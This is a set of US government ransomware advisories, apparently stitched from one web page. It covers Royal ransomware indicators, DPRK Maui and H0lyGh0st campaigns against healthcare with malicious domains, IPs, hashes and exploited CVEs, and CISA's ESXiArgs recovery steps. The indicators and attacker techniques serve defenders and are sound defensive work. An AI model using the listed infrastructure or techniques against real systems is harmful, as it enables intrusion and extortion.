ciborkumari[.]xyz |
December 2022 |
myappearinc[.]com |
December 2022 |
parkerpublic[.]com |
December 2022 |
pastebin.mozilla[.]org/Z54Vudf9/raw |
December 2022 |
tumbleproperty[.]com |
December 2022 |
myappearinc[.]com/acquire/draft/c7lh0s5jv |
January 2023 |
Tool |
SHA256 |
---|---|
AV tamper |
8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375 |
TCP/UDP Tunnel over HTTP (Chisel) |
8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451 |
Ursnif/Gozi |
be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1 |
Exfil |
B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20 |
Remote Access (AnyDesk) |
4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7 |
PowerShell Toolkit Downloader |
4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce |
PsExec (Microsoft Sysinternals) |
08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c |
Keep Host Unlocked (Don’t Sleep) |
f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee |
Ransomware Executable |
d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681 |
Windows Command Line (NirCmd) |
216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5 |
System Management (NSudo) |
19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618 |
Batch Scripts |
|
Filename |
Hash Value |
2.bat |
585b05b290d241a249af93b1896a9474128da969 |
3.bat |
41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d |
4.bat |
a84ed0f3c46b01d66510ccc9b1fc1e07af005c60 |
8.bat |
c96154690f60a8e1f2271242e458029014ffe30a |
kl.bat |
65dc04f3f75deb3b287cca3138d9d0ec36b8bea0 |
gp.bat |
82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58 |
r.bat |
74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c |
runanddelete.bat |
342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE |
See table 3 for all referenced threat actor tactics and techniques included in this advisory.
Initial Access |
||
---|---|---|
Technique Title |
ID |
Use |
Exploit Public Facing Application |
The actors gain initial access through public-facing applications. |
|
Phishing: Spear phishing Attachment |
The actors gain initial access through malicious PDF attachments sent via email. |
|
Phishing: Spearphishing Link |
The actors gain initial access using malvertising links via emails and public-facing sites. |
|
External Remote Services |
The actors gain initial access through a variety of RMM software. |
|
Command and Control |
||
Technique Title |
ID |
Use |
Ingress Tool Transfer |
The actors used C2 infrastructure to download multiple tools. |
|
Protocol Tunneling |
The actors used an encrypted SSH tunnel to communicate within C2 infrastructure. |
|
Privilege Escalation |
||
Technique Title |
ID |
Use |
Valid Accounts: Domain Accounts |
The actors used encrypted files to create new admin user accounts. |
|
Defense Evasion |
||
Technique Title |
ID |
Use |
Impair Defenses: Disable or Modify Tools |
The actors deactivated antivirus protocols. |
|
Domain Policy Modification: Group Policy Modification |
The actors modified Group Policy Objects to subvert antivirus protocols. |
|
Indicator Removal: Clear Windows Event Logs |
The actors deleted shadow files and system and security logs after exfiltration. |
|
Remote Desktop Protocol |
The actors used valid accounts to move laterally through the domain controller using RDP. |
|
Automated Collection |
The actors used registry keys to auto-extract and collect files. |
|
Impact |
||
Technique Title |
ID |
Use |
Data Encrypted for Impact |
The actors encrypted data to determine which files were being used or blocked by other applications. |
FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
[1] Royal Rumble: Analysis of Royal Ransomware (cybereason.com)
[2] DEV-0569 finds new ways to deliver Royal ransomware, various payloads - Microsoft Security Blog
[3] 2023-01: ACSC Ransomware Profile - Royal | Cyber.gov.au
Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA.
Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we'd welcome your feedback.
Note: This Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and various ransomware threat actors. These #StopRansomware advisories detail historically and recently observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn about other ransomware threats and no-cost resources.
The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.
This CSA provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware and updates the July 6, 2022, joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. This advisory highlights TTPs and IOCs DPRK cyber actors used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.
The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments—specific targets include Department of Defense Information Networks and Defense Industrial Base member networks. The IOCs in this product should be useful to sectors previously targeted by DPRK cyber operations (e.g., U.S. government, Department of Defense, and Defense Industrial Base). The authoring agencies highly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.
For additional information on state-sponsored DPRK malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage.
Download the PDF version of this report: pdf, 661 kb.
For a downloadable copy of IOCs, see
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
This CSA is supplementary to previous reports on malicious cyber actor activities involving DPRK ransomware campaigns—namely Maui and H0lyGh0st ransomware. The authoring agencies are issuing this advisory to highlight additional observed TTPs DPRK cyber actors are using to conduct ransomware attacks targeting South Korean and U.S. healthcare systems.
The TTPs associated with DPRK ransomware attacks include those traditionally observed in ransomware operations. Additionally, these TTPs span phases from acquiring and purchasing infrastructure to concealing DPRK affiliation:
Actors also likely spread malicious code through Trojanized files for “X-Popup,” an open source messenger commonly used by employees of small and medium hospitals in South Korea [T1195].
The actors spread malware by leveraging two domains: xpopup.pe[.]kr
and xpopup.com
. xpopup.pe[.]kr
is registered to IP address 115.68.95[.]128
and xpopup[.]com
is registered to IP address 119.205.197[.]111
. Related file names and hashes are listed in table 1.
File Name | MD5 Hash |
---|---|
xpopup.rar | 1f239db751ce9a374eb9f908c74a31c9 |
X-PopUp.exe | 6fb13b1b4b42bac05a2ba629f04e3d03 |
X-PopUp.exe | cf8ba073db7f4023af2b13dd75565f3d |
xpopup.exe | 4e71d52fc39f89204a734b19db1330d3 |
x-PopUp.exe | 43d4994635f72852f719abb604c4a8a1 |
xpopup.exe | 5ae71e8440bf33b46554ce7a7f3de666 |
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the U.S. National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. For more information on the CPGs, including additional recommended baseline protections, see cisa.gov/cpg.
The authoring agencies urge HPH organizations to:
In addition, the authoring agencies urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for and mitigate ransomware incidents:
If a ransomware incident occurs at your organization:
Stairwell provided a YARA rule to identify Maui ransomware, and a Proof of Concept public RSA key extractor at the following link:
https://www.stairwell.com/news/threat-research-report-maui-ransomware/
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files. As stated above, the authoring agencies discourage paying ransoms. Payment does not guarantee files will be recovered and may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, the agencies understand that when victims are faced with an inability to function, all options are evaluated to protect shareholders, employees, and customers.
Regardless of whether you or your organization decide to pay a ransom, the authoring agencies urge you to promptly report ransomware incidents using the contact information above.
NSA, FBI, CISA, and HHS would like to thank ROK NIS and DSA for their contributions to this CSA.
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
Microsoft Threat Intelligence Center is a registered trademark of Microsoft Corporation. Apache®, Sonicwall, and Apache Log4j are trademarks of Apache Software Foundation. TerraMaster Operating System is a registered trademark of Octagon Systems.
This document was developed in furtherance of the authors’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
CVE-2021-44228 CVSS 3.0: 10 (Critical) |
---|
Vulnerability Description Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. |
Recommended Mitigations Apply patches provided by vendor and perform required system updates. |
Detection Methods See vendors’ Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability. |
Vulnerable Technologies and Versions There are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, please check https://nvd.nist.gov/vuln/detail/CVE-2021-44228. |
See https://nvd.nist.gov/vuln/detail/CVE-2021-44228 for more information. |
CVE-2021-20038 CVSS 3.0: 9.8 (Critical) |
---|
Vulnerability Description A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions. |
Recommended Mitigations Apply all appropriate vendor updates Upgrade to:
System administrators should refer to the SonicWall Security Advisories in the reference section to determine affected applications/systems and appropriate fix actions. Support for 9.0.0 firmware ended on 10/31/2021. Customers still using that firmware are requested to upgrade to the latest 10.2.x versions. |
Vulnerable Technologies and Versions Sonicwall Sma 200 Firmware 10.2.0.8-37Sv Sonicwall Sma 200 Firmware 10.2.1.1-19Sv Sonicwall Sma 200 Firmware 10.2.1.2-24Sv Sonicwall Sma 210 Firmware 10.2.0.8-37Sv Sonicwall Sma 210 Firmware 10.2.1.1-19Sv Sonicwall Sma 210 Firmware 10.2.1.2-24Sv Sonicwall Sma 410 Firmware 10.2.0.8-37Sv Sonicwall Sma 410 Firmware 10.2.1.1-19Sv Sonicwall Sma 410 Firmware 10.2.1.2-24Sv Sonicwall Sma 400 Firmware 10.2.0.8-37Sv Sonicwall Sma 400 Firmware 10.2.1.1-19Sv Sonicwall Sma 400 Firmware 10.2.1.2-24Sv Sonicwall Sma 500V Firmware 10.2.0.8-37Sv Sonicwall Sma 500V Firmware 10.2.1.1-19Sv Sonicwall Sma 500V Firmware 10.2.1.2-24Sv |
See https://nvd.nist.gov/vuln/detail/CVE-2021-20038 for more information. |
CVE-2022-24990 CVSS 3.x: N/A |
---|
Vulnerability Description The TerraMaster OS Unauthenticated Remote Command Execution via PHP Object Instantiation Vulnerability is characterized by scanning activity targeting a flaw in the script enabling a remote adversary to execute commands on the target endpoint. The vulnerability is created by improper input validation of the webNasIPS component in the api.php script and resides on the TNAS device appliances' operating system where users manage storage, backup data, and configure applications. By exploiting the script flaw a remote unauthenticated attacker can pass specially crafted data to the application and execute arbitrary commands on the target system. This may result in complete compromise of the target system, including the exfiltration of information. TNAS devices can be chained to acquire unauthenticated remote code execution with highest privileges. |
Recommended Mitigations Install relevant vendor patches. This vulnerability was patched in TOS version 4.2.30 |
Vulnerable Technologies and Versions TOS v 4.2.29 |
See https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ and https://forum.terra-master.com/en/viewtopic.php?t=3030 for more information. |
The IOC section includes hashes and IP addresses for the Maui and H0lyGh0st ransomware variants—as well as custom malware implants assumedly developed by DPRK cyber actors, such as remote access trojans (RATs), loaders, and other tools—that enable subsequent deployment of ransomware. For additional Maui IOCs, see joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.
Table 2 lists MD5 and SHA256 hashes associated with malware implants, RATs, and other tools used by DPRK cyber actors, including tools that drop Maui ransomware files.
MD5Hash | SHA256Hash |
---|---|
079b4588eaa99a1e802adf5e0b26d8aa | f67ee77d6129bd1bcd5d856c0fc5314169b946d32b8abaa4e680bb98130b38e7 |
0e9e256d8173854a7bc26982b1dde783 | -- |
12c15a477e1a96120c09a860c9d479b3 | 6263e421e397db821669420489d2d3084f408671524fd4e1e23165a16dda2225 |
131fc4375971af391b459de33f81c253 | -- |
17c46ed7b80c2e4dbea6d0e88ea0827c | b9af4660da00c7fa975910d0a19fda072031c15fad1eef935a609842c51b7f7d |
1875f6a68f70bee316c8a6eda9ebf8de | 672ec8899b8ee513dbfc4590440a61023846ddc2ca94c88ae637144305c497e7 |
1a74c8d8b74ca2411c1d3d22373a6769 | ba8f9e7afe5f78494c111971c39a89111ef9262bf23e8a764c6f65c818837a44 |
1f6d9f8fbdbbd4e6ed8cd73b9e95a928 | 4f089afa51fd0c1b2a39cc11cedb3a4a326111837a5408379384be6fe846e016 |
2d02f5499d35a8dffb4c8bc0b7fec5c2 | 830207029d83fd46a4a89cd623103ba2321b866428aa04360376e6a390063570 |
2e18350194e59bc6a2a3f6d59da11bd8 | 655aa64860f1655081489cf85b77f72a49de846a99dd122093db4018434b83ae |
3bd22e0ac965ebb6a18bb71ba39e96dc | 6b7f566889b80d1dba4f92d5e2fb2f5ef24f57fcfd56bb594978dffe9edbb9eb |
40f21743f9cb927b2c84ecdb7dfb14a6 | 5081f54761947bc9ce4aa2a259a0bd60b4ec03d32605f8e3635c4d4edaf48894 |
4118d9adce7350c3eedeb056a3335346 | 5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e |
43e756d80225bdf1200bc34eef5adca8 | afb2d4d88f59e528f0e388705113ae54b7b97db4f03a35ae43cc386a48f263a0 |
47791bf9e017e3001ddc68a7351ca2d6 | 863b707873f7d653911e46885e261380b410bb3bf6b158daefb47562e93cb657 |
505262547f8879249794fc31eea41fc6 | f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c |
5130888a0ad3d64ad33c65de696d3fa2 | c92c1f3e77a1876086ce530e87aa9c1f9cbc5e93c5e755b29cad10a2f3991435 |
58ad3103295afcc22bde8d81e77c282f | 18b75949e03f8dcad513426f1f9f3ca209d779c24cd4e941d935633b1bec00cb |
5be1e382cd9730fbe386b69bd8045ee7 | 5ad106e333de056eac78403b033b89c58b4c4bdda12e2f774625d47ccfd3d3ae |
5c6f9c83426c6d33ff2d4e72c039b747 | a3b7e88d998078cfd8cdf37fa5454c45f6cbd65f4595fb94b2e9c85fe767ad47 |
640e70b0230dc026eff922fb1e44c2ea | 6319102bac226dfc117c3c9e620cd99c7eafbf3874832f2ce085850aa042f19c |
67f4dad1a94ed8a47283c2c0c05a7594 | 3fe624c33790b409421f4fa2bb8abfd701df2231a959493c33187ed34bec0ae7 |
70652edadedbacfd30d33a826853467d | 196fb1b6eff4e7a049cea323459cfd6c0e3900d8d69e1d80bffbaabd24c06eba |
739812e2ae1327a94e441719b885bd19 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 |
76c3d2092737d964dfd627f1ced0af80 | bffe910904efd1f69544daa9b72f2a70fb29f73c51070bde4ea563de862ce4b1 |
802e7d6e80d7a60e17f9ffbd62fcbbeb | 87bdb1de1dd6b0b75879d8b8aef80b562ec4fad365d7abbc629bcfc1d386afa6 |
827103a6b6185191fd5618b7e82da292 | -- |
830bc975a04ab0f62bfedf27f7aca673 | -- |
85995257ac07ae5a6b4a86758a2283d7 | -- |
85f6e3e3f0bdd0c1b3084fc86ee59d19 | f1576627e8130e6d5fde0dbe3dffcc8bc9eef1203d15fcf09cd877ced1ccc72a |
87a6bda486554ab16c82bdfb12452e8b | 980bb08ef3e8afcb8c0c1a879ec11c41b29fd30ac65436495e69de79c555b2be |
891db50188a90ddacfaf7567d2d0355d | 0837dd54268c373069fc5c1628c6e3d75eb99c3b3efc94c45b73e2cf9a6f3207 |
894de380a249e677be2acb8fbdfba2ef | -- |
8b395cc6ecdec0900facf6e93ec48fbb | -- |
92a6c017830cda80133bf97eb77d3292 | d1aba3f95f11fc6e5fec7694d188919555b7ff097500e811ff4a5319f8f230be |
9b0e7c460a80f740d455a7521f0eada1 | 45d8ac1ac692d6bb0fe776620371fca02b60cac8db23c4cc7ab5df262da42b78 |
9b9d4cb1f681f19417e541178d8c75d7 | f5f6e538001803b0aa008422caf2c3c2a79b2eeee9ddc7feda710e4aba96fea4 |
a1f9e9f5061313325a275d448d4ddd59 | dfdd72c9ce1212f9d9455e2bca5a327c88d2d424ea5c086725897c83afc3d42d |
a452a5f693036320b580d28ee55ae2a3 | 99b0056b7cc2e305d4ccb0ac0a8a270d3fceb21ef6fc2eb13521a930cea8bd9f |
a6e1efd70a077be032f052bb75544358 | 3b9fe1713f638f85f20ea56fd09d20a96cd6d288732b04b073248b56cdaef878 |
ad4eababfe125110299e5a24be84472e | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa |
b1c1d28dc7da1d58abab73fa98f60a83 | 38491f48d0cbaab7305b5ddca64ba41a2beb89d81d5fb920e67d0c7334c89131 |
b6f91a965b8404d1a276e43e61319931 | -- |
bdece9758bf34fcad9cba1394519019b | 9d6de05f9a3e62044ad9ae66111308ccb9ed2ee46a3ea37d85afa92e314e7127 |
c3850f4cc12717c2b54753f8ca5d5e0e | 99b448e91669b92c2cc3417a4d9711209509274dab5d7582baacfab5028a818c |
c50b839f2fc3ce5a385b9ae1c05def3a | 458d258005f39d72ce47c111a7d17e8c52fe5fc7dd98575771640d9009385456 |
cf236bf5b41d26967b1ce04ebbdb4041 | 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 |
d0e203e8845bf282475a8f816340f2e8 | f6375c5276d1178a2a0fe1a16c5668ce523e2f846c073bf75bb2558fdec06531 |
ddb1f970371fa32faae61fc5b8423d4b | dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469 |
f2f787868a3064407d79173ac5fc0864 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae |
fda3a19afa85912f6dc8452675245d6b | 56925a1f7d853d814f80e98a1c4890b0a6a84c83a8eded34c585c98b2df6ab19 |
-- | 0054147db54544d77a9efd9baf5ec96a80b430e170d6e7c22fcf75261e9a3a71 |
-- | 151ab3e05a23e9ccd03a6c49830dabb9e9281faf279c31ae40b13e6971dd2fb8 |
-- | 1c926fb3bd99f4a586ed476e4683163892f3958581bf8c24235cd2a415513b7f |
-- | 1f8dcfaebbcd7e71c2872e0ba2fc6db81d651cf654a21d33c78eae6662e62392 |
-- | f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb |
-- | 23eff00dde0ee27dabad28c1f4ffb8b09e876f1e1a77c1e6fb735ab517d79b76 |
-- | 586f30907c3849c363145bfdcdabe3e2e4688cbd5688ff968e984b201b474730 |
-- | 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5 |
-- | 90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4 |
-- | c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f |
-- | ca932ccaa30955f2fffb1122234fb1524f7de3a8e0044de1ed4fe05cab8702a5 |
-- | f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332 |
-- | f78cabf7a0e7ed3ef2d1c976c1486281f56a6503354b87219b466f2f7a0b65c4 |
Table 3 lists MD5 and SHA256 hashes are associated with Maui Ransomware files.
MD5 Hash | SHA256 Hash |
---|---|
4118d9adce7350c3eedeb056a3335346 | 5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e |
9b0e7c460a80f740d455a7521f0eada1 | 45d8ac1ac692d6bb0fe776620371fca02b60cac8db23c4cc7ab5df262da42b78 |
fda3a19afa85912f6dc8452675245d6b | 56925a1f7d853d814f80e98a1c4890b0a6a84c83a8eded34c585c98b2df6ab19 |
2d02f5499d35a8dffb4c8bc0b7fec5c2 | 830207029d83fd46a4a89cd623103ba2321b866428aa04360376e6a390063570 |
c50b839f2fc3ce5a385b9ae1c05def3a | 458d258005f39d72ce47c111a7d17e8c52fe5fc7dd98575771640d9009385456 |
a452a5f693036320b580d28ee55ae2a3 | 99b0056b7cc2e305d4ccb0ac0a8a270d3fceb21ef6fc2eb13521a930cea8bd9f |
a6e1efd70a077be032f052bb75544358 | 3b9fe1713f638f85f20ea56fd09d20a96cd6d288732b04b073248b56cdaef878 |
802e7d6e80d7a60e17f9ffbd62fcbbeb | 87bdb1de1dd6b0b75879d8b8aef80b562ec4fad365d7abbc629bcfc1d386afa6 |
-- | 0054147db54544d77a9efd9baf5ec96a80b430e170d6e7c22fcf75261e9a3a71 |
Table 4 lists MD5 and SHA256 hashes associated with H0lyGh0st Ransomware files.
SHA256 Hash |
---|
99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd* |
F8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86* |
Bea866b327a2dc2aa104b7ad7307008919c06620771ec3715a059e675d9f40af* |
6e20b73a6057f8ff75c49e1b7aef08abfcfe4e418e2c1307791036f081335c2d |
f4d10b08d7dacd8fe33a6b54a0416eecdaed92c69c933c4a5d3700b8f5100fad |
541825cb652606c2ea12fd25a842a8b3456d025841c3a7f563655ef77bb67219 |
2d978df8df0cf33830aba16c6322198e5889c67d49b40b1cb1eb236bd366826d |
414ed95d14964477bebf86dced0306714c497cde14dede67b0c1425ce451d3d7 |
Df0c7bb88e3c67d849d78d13cee30671b39b300e0cda5550280350775d5762d8 |
MD5 Hash |
---|
a2c2099d503fcc29478205f5aef0283b |
9c516e5b95a7e4169ecbd133ed4d205f |
d6a7b5db62bf7815a10a17cdf7ddbd4b |
c6949a99c60ef29d20ac8a9a3fb58ce5 |
4b20641c759ed563757cdd95c651ee53 |
25ee4001eb4e91f7ea0bc5d07f2a9744 |
18126be163eb7df2194bb902c359ba8e |
eaf6896b361121b2c315a35be837576d |
e4ee611533a28648a350f2dab85bb72a |
e268cb7ab778564e88d757db4152b9fa |
* from Microsoft blog post on h0lygh0st
NSA Client Requirements / General Cybersecurity Inquiries: CybersecurityReports@nsa.gov
Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
To report incidents and anomalous activity related to information found in this Joint Cybersecurity Advisory, contact CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870 or your local FBI field office at www.fbi.gov/contact-us/field. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
Media Inquiries / Press Desk:
The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.” Malicious actors may be exploiting known vulnerabilities in VMware ESXi servers that are likely running unpatched and out-of-service or out-of-date versions of VMware ESXi software to gain access and deploy ransomware. The ESXiArgs ransomware encrypts configuration files on ESXi servers, potentially rendering virtual machines (VMs) unusable.
CISA has released an ESXiArgs recovery script at github.com/cisagov/ESXiArgs-Recover. Organizations that have fallen victim to ESXiArgs ransomware can use this script to attempt to recover their files. This CSA provides guidance on how to use the script.
ESXiArgs actors have compromised over 3,800 servers globally. CISA and FBI encourage all organizations managing VMware ESXi servers to:
If malicious actors have compromised your organization with ESXiArgs ransomware, CISA and FBI recommend following the script and guidance provided in this CSA to attempt to recover access to your files.
Download the PDF version of this report:
Note: CISA and FBI will update this CSA as more information becomes available.
Open-source reporting indicates that malicious actors are exploiting known vulnerabilities in VMware ESXi software to gain access to servers and deploy ESXiArgs ransomware. The actors are likely targeting end-of-life ESXi servers or ESXi servers that do not have the available ESXi software patches applied.[1]
ESXiArgs ransomware encrypts certain configuration files on ESXi servers, potentially rendering VMs unusable. Specifically, the ransomware encrypts configuration files associated with the VMs; it does not encrypt flat files. As a result, it is possible, in some cases, for victims to reconstruct the encrypted configuration files based on the unencrypted flat file. The recovery script documented below automates the process of recreating configuration files. The full list of file extensions encrypted by the malware is: vmdk
, vmx
, vmxf
, vmsd
, vmsn
, vswp
, vmss
, nvram
, vmem
.
CISA and FBI do not encourage paying the ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, CISA and FBI urge you to promptly report ransomware incidents to a local FBI Field Office, or to CISA at cisa.gov/report.
CISA is providing these steps to enable organizations to attempt recovery of their VMs. CISA’s GitHub ESXiArgs recovery script, which also outlines these steps, is available at github.com/cisagov/ESXiArgs-Recover. CISA is aware that some organizations have reported success in recovering files without paying ransoms. CISA’s script is based on findings published by third-party researchers.[2]
Any organization seeking to use CISA’s ESXiArgs recovery script should carefully review the script to determine if it is appropriate for their environment before deploying it. This script does not seek to delete the encrypted configuration files, but instead seeks to create new configuration files that enable access to the VMs. While CISA works to ensure that scripts like this one are safe and effective, this script is delivered without warranty, either implicit or explicit. Do not use this script without understanding how it may affect your system. CISA does not assume liability for damage caused by this script. Note: Organizations that run into problems with the script can create a GitHub issue at https://github.com/cisagov/ESXiArgs-Recover/issues; CISA will do our best to resolve concerns.
/tmp/recover.sh
.wget
: wget -O /tmp/recover.sh
https://raw.githubusercontent.com/cisagov/ESXiArgs-Recover/main/recover.sh.
chmod +x /tmp/recover.sh
ls
to view the files.
ls /vmfs/volumes/datastore1
. For instance, if the folder is called example
, run cd /vmfs/volumes/datastore1/example
.ls
. Note the name of the VM (via naming convention: [name].vmdk
)./tmp/recover.sh [name]
, where [name]
is the name of the VM determined previously.
/tmp/recover.sh [name] thin
.cd /usr/lib/vmware/hostd/docroot/ui/ && mv index.html ransom.html && mv index1.html index.html
.cd /usr/lib/vmware/hostd/docroot && mv index.html ransom.html && rm index.html && mv index1.html index.html
.reboot
command). After a few minutes, you should be able to navigate to the web interface.Unregister
(see figure 1).Figure 1: Unregistering the virtual machine.
Create / Register VM
(see figure 2).Register an existing virtual machine
(see figure 2).Figure 2: Registering the virtual machine, selecting machine to register.
Click Select one or more virtual machines, a datastore or a directory
to navigate to the folder of the VM you restored. Select the vmx
file in the folder (see figure 3).
Figure 3: Registering the virtual machine, finalizing registration.
Select Next
and Finish
. You should now be able to use the VM as normal.
Figure 3: Registering the virtual machine, finalizing registration.
Select Next and Finish. You should now be able to use the VM as normal.
The above script only serves as a method to recover essential services. Although CISA and FBI have not seen any evidence that the actors have established persistence, we recommend organizations take the following additional incident response actions after applying the script:
If you detect activity from the above, implement your incident response plan. CISA and FBI urge you to promptly report ransomware incidents to a local FBI Field Office, or to CISA at cisa.gov/report.
Organizations should also collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.
See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA also encourages government network administrators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response.
Additional resources for recovering .vmdk
